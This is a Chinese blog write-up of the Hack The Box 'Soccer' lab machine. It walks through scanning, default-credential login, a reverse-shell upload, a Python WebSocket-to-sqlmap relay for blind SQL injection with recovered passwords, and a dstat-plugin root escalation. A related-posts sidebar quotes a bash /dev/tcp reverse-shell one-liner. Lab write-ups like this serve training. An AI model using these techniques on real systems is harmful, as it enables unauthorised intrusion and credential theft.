靶场笔记-HTB Soccer

于 2023-02-11 14:02:22 发布
阅读量310 收藏
点赞数 2
分类专栏: Hack The Box 文章标签: web安全 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Timerings/article/details/128983057
版权

Soccer

一、常规nmap扫描

在这里插入图片描述

发现该靶机开放了22和80端口,并且使用Nginx

二、80端口渗透

  • 访问80端口,显示一个静态页面,并无其他信息
    在这里插入图片描述

  • 进行目录扫描

    在这里插入图片描述

    发现tiny目录,访问发现是个登录入口,经Google大法发现这个入口默认密码为admin:admin@123

    在这里插入图片描述

  • 登录后,发现其具有上传文件功能点,于是上传一个反弹shell马并成功返回shell

    在这里插入图片描述

    在这里插入图片描述

  • 返回的是一个非交互式shell,利用dpkg -l | grep python查看其具有python,并利用python生成一个交互式shell

    在这里插入图片描述

  • 通过/etc/passwd查询得知该机器有一个名为player的用户

    在这里插入图片描述

  • 由于之前扫描端口时发现这个网站使用Nginx,于是访问Nginx的配置文件,并通过访问默认站点配置文件,发现其还有另一个子域名为soc-player.soccer.htb

www-data@soccer:/etc/nginx$ cat nginx.conf
cat nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
        worker_connections 768;
        # multi_accept on;
}

http {

        ##
        # Basic Settings
        ##

        sendfile on;
        tcp_nopush on;
        tcp_nodelay on;
        keepalive_timeout 65;
        types_hash_max_size 2048;
        # server_tokens off;

        # server_names_hash_bucket_size 64;
        # server_name_in_redirect off;

        include /etc/nginx/mime.types;
        default_type application/octet-stream;

        ##
        # SSL Settings
        ##

        ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE
        ssl_prefer_server_ciphers on;

        ##
        # Logging Settings
        ##

        access_log /var/log/nginx/access.log;
        error_log /var/log/nginx/error.log;

        ##
        # Gzip Settings
        ##

        gzip on;

        # gzip_vary on;
        # gzip_proxied any;
        # gzip_comp_level 6;
        # gzip_buffers 16 8k;
        # gzip_http_version 1.1;
        # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

        ##
        # Virtual Host Configs
        ##

        include /etc/nginx/conf.d/*.conf;
        include /etc/nginx/sites-enabled/*;
}


#mail {
#       # See sample authentication script at:
#       # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
# 
#       # auth_http localhost/auth.php;
#       # pop3_capabilities "TOP" "USER";
#       # imap_capabilities "IMAP4rev1" "UIDPLUS";
# 
#       server {
#               listen     localhost:110;
#               protocol   pop3;
#               proxy      on;
#       }
# 
#       server {
#               listen     localhost:143;
#               protocol   imap;
#               proxy      on;
#       }
#}


www-data@soccer:/etc/nginx/sites-enabled$ cat soc-player.htb
cat soc-player.htb
server {
        listen 80;
        listen [::]:80;

        server_name soc-player.soccer.htb;

        root /root/app/views;

        location / {
                proxy_pass http://localhost:3000;
                proxy_http_version 1.1;
                proxy_set_header Upgrade $http_upgrade;
                proxy_set_header Connection 'upgrade';
                proxy_set_header Host $host;
                proxy_cache_bypass $http_upgrade;
        }

}
  • 访问子域名soc-player.soccer.htb,发现其是具有注册登录功能的页面,于是自行注册账号并登录

在这里插入图片描述

  • 登录进来发现只有一个验证ticket的界面,具有websocket接口

    在这里插入图片描述

  • 因其与数据库交互,尝试sql注入,通过验证发现可以进行布尔盲注

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

  • 布尔盲注纯手工注入太耗时间但是sqlmap无法直接对websocket接口进行自动化注入,通过google搜索找到一篇参考文章

    Automating Blind SQL injection over WebSocket | Rayhan0x01’s Blog

    首先需要创建一个python脚本,代码如下:

    from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection

ws_server = "ws://soc-player.soccer.htb:9091/"

def send_ws(payload):
        ws = create_connection(ws_server)
        # If the server returns a response on connect, use below line
        #resp = ws.recv() # If server returns something like a token on connect you can find and extract from here

        # For our case, format the payload in JSON
        message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
        data = '{"id":"%s"}' % message

        ws.send(data)
        resp = ws.recv()
        ws.close()

        if resp:
                return resp
        else:
                return ''

def middleware_server(host_port,content_type="text/plain"):

        class CustomHandler(SimpleHTTPRequestHandler):
                def do_GET(self) -> None:
                        self.send_response(200)
                        try:
                                payload = urlparse(self.path).query.split('=',1)[1]
                        except IndexError:
                                payload = False

                        if payload:
                                content = send_ws(payload)
                        else:
                                content = 'No parameters specified!'

                        self.send_header("Content-type", content_type)
                        self.end_headers()
                        self.wfile.write(content.encode())
                        return

        class _TCPServer(TCPServer):
                allow_reuse_address = True

        httpd = _TCPServer(host_port, CustomHandler)
        httpd.serve_forever()


print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")

try:
        middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
        pass

    运行脚本并在另一个终端执行以下命令来进行sqlmap自动化注入

    sqlmap -u http://localhost:8081?id=1 -p id --dbs

    经过漫长的等待,获取到数据库用户名密码player:PlayerOftheMatch2022

    在这里插入图片描述

  • 利用得到的用户名密码进行ssh登录,获取到第一个flag

    在这里插入图片描述

三、提权

  • 常规进行sudo,suid等信息收集,经过一顿折腾发现doas这个组件能以写入插件的方式进行suid提权

    在这里插入图片描述

  • 首先在/usr/local/share/dstat/中写入一个一个dastat_开头的py文件,命名随意,内容为

    import os
os.system("bash -i")

    运行脚本后成功提权至root

    在这里插入图片描述

  • 随后在root文件夹下得到第二个rootflag

    在这里插入图片描述

Timerings
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python端口通信_Python实现TCP/IP协议下的端口转发及重定向示例
weixin_34549315的博客
02-04 1147
首先,我们用webpy写一个简单的网站,监听8080端口,返回“Hello, EverET.org”的页面。然后我们使用我们的forwarding.py,在80端口和8080端口中间建立两条通信管道用于双向通信。此时,我们通过80端口访问我们的服务器。浏览器得到:然后,我们在forwarding.py的输出结果中可以看到浏览器和webpy之间的通信内容。代码:#!/usr/bin/env pyth...
Python程序设计——安全渗透测试的常见模块
bluepangzi的博客
03-29 976
安全渗透测试的常见模块一、Socket 模块1.实例化 Socket 类2.Socket常用的函数—服务端函数bind():listen():accept():3.客户端的函数send():sendall():recv():sendto():recvfrom():4.使用Socket编写一个简单的服务端和客户端二、python-nmap模块1.python-nmap安装过程2.python-nmap模块类的实例化PortScanner类3.python-nmap模块中的函数scan()函数:参数hosts参
Python渗透测试之流量分析:流量嗅探工具编程
Liu_Bruce的博客
04-23 3865
Python渗透测试之流量分析:流量嗅探工具编程 ​ 不少人存在这样的观点:只要计算机安装各种专业的安全软件,系统及时更新补丁,密码尽可能复杂,那么计算机就会避免遭到入侵。当然这样的确不容易被入侵,但那也只是对传统的病毒、木马而言,在流量攻击面前,这些防护就会显得无能为力。无论何时,当你与其他设备进行通信时就会产生流量,当这些流量脱离了你的计算机后,其安全就不能得到有效的保障,然而这些流量中却包含着你的敏感数据,攻击者完全可以在不入侵你计算机的情况下获得你的敏感数据,这个过程叫流量嗅探。 实验环境: O
pyexp靶机总结
qq_45301512的博客
01-08 562
靶机下载地址:打开靶机.使用nmap扫描出靶机的ip和开放的端口可以看到,靶机开放了1337端口和3306端口1337端口是ssh的端口,3306是mysql数据库的端口根据之前做靶机的经验来看,一般是开放80端口,然后根据网站去找到合适的方法getshell,但是这里没有开放80端口,因此只能考虑1337端口和3306端口那么先对这两个端口进行爆破一波,看是否能爆破出登录的密码由于不知道存在什么用户,因此只能先尝试root用户的爆破。
python 渗透测试基础-网络通讯
慕容卡卡
03-23 1260
本文转载自【 python 渗透测试基础-网络通讯】https://www.lzfkj.vip/post/20 文章目录python 渗透测试基础-网络通讯简述TCP实例TCP 服务端TCP 客户端运行结果TCP的另外一个客户端TCP的SSL请求客户端UDP实例UDP 服务端UDP 客户端 python 渗透测试基础-网络通讯 简述     在很多情况下,我们所在的测试环境并没有给我们提供很多有利的条件,特别是在一些审计等级高的地方,更是直接断开物理连接;除了这个方式
armageddon-htb
04-01
【压缩包子文件的文件名称列表】:“armageddon-htb-main”可能是这个挑战的主要资料或配置文件,包含了攻防过程中所需的详细信息,如IP地址、初始凭证、端口扫描结果、漏洞利用脚本、系统日志等。挑战者可能需要...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
T-HTB manager-开源
05-03
T-HTB免费网络界面,内置PHP,简单的Java脚本,Ajax,嵌套集模型MySQL,rrd图,使用iptables创建tc命令CLASSIFY
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
The-Waitlisted-HtB
05-04
等待名单的HtB 一个与语言交换伙伴匹配的Web应用程序
python网络渗透入门_利用Python进行Web渗透测试(四):HTTP协议基础
weixin_39890543的博客
12-10 215
本篇将会涉及:什么是HTTP,以及HTTP的工作方式HTTP的方法一、什么是HTTPHTTP协议HTTP全称超文本传输协议,一个设计用来来客户端和服务器之间进行通信的协议。HTTP在网络世界中属于OSI模型的第七层——应用层,也属于TCP/IP模型的第四层——应用层。关于什么是OSI模型,什么又是TCP/IP模型,简而言之,其是计算机网络世界的一个网络体系结构,用来定义计算机网络及其各个部分通信的...
渗透中反弹shell与端口
千寻的博客
01-03 1816
渗透中反弹shell与端口 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 python版本: `python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S...
靶机渗透测试实战(三)——DC-3
weixin_45116657的博客
10-10 3406
实验环境 靶机(DC-3),IP地址未知; 测试机kali,IP地址:192.168.85.131 实验步骤: 1、 主机扫描 命令:1. Arp-scan -l 没有发现靶机IP,判断靶机没有分配到IP地址,因此先进去单用户设置网络 2、重启靶机 2.1> 启动系统后,我们按e键进入grub模式; 2.2> Ctrl +x 进入单用户模式; 2.3> 进入编辑...
Python程序设计-安全渗透测试-情报收集
Xunuannuan的博客
04-26 802
信息收集基础
靶机渗透测试(Mr-Robot: 1)
@小张小张的博客
11-05 1197
靶机渗透测试(Mr-Robot: 1): Vulnhub靶机 Mr-Robot: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(beginner-intermediate.) 目标:This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find 进
Python渗透测试之Scapy模块&情报收集
waqqy的博客
04-25 4026
Scapy模块文件 关于Scapy Scapy是一个由Python语言编写的强大工具,它是大量程序编写人员最喜爱的一个网络模块。 也可以在自己的程序中使用这个模块来实现对网络数据包的发送、监听和解析。 这个模块相比起Nmap来说,更为底层。可以更为直观地了解到网络中的各种扫描和攻击行为,例如,要检测某一个端口是否开放,只需提供给Nmap一个端口号,而Nmap就会给出一个开放或者关闭的结果,但是并不知道Nmap是怎么做的。 如果想对网络中的各种问题进行深入研究,Scapy无疑是一个更好的选择,可以利用它来产
内网渗透之——内网转发(反弹shell、端口、代理)
热门推荐
wsnbbz的博客
04-03 1万+
目的 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口。 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。 代理方式 正向代理 正向代理是客户端主动访问服务器的端口 我们常说的代理就是指正向代理,正向代理的过程,它...
python渗透攻击
weixin_50699777的博客
04-01 5805
文章目录前言一、拒绝服务攻击1.含义2.数据链路层的拒绝服务攻击3.网络层的拒绝服务攻击4.传输层的拒绝服务攻击5.应用层的拒绝服务攻击二、身份认证攻击1.简单网络服务攻击的认证2.破解密码字典3.FTP暴力破解模块三、网络嗅探与欺骗1.网络数据嗅探2.ARP的原理与缺陷 前言 这是Python渗透测试编程技术,基于python模块是实现的 一、拒绝服务攻击 1.含义 拒绝服务攻击即是攻击者想办法让目标机器停止提供服务,是黑客常用的攻击手段之一。 拒绝服务攻击并不是一个攻击方式,而是一类具有相似特征的攻击
python实现利用nmap和爱站扫描开放80端口的IP并进行反向域名解析
01-19 3562
#!/usr/bin/python # -*- coding: utf-8 -*- from libnmap.process import NmapProcess from libnmap.parser import NmapParser import requests x=90 while x < 255: print "\033[1;31mstart 118.192.%s.0/24\033
format htb
最新发布
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值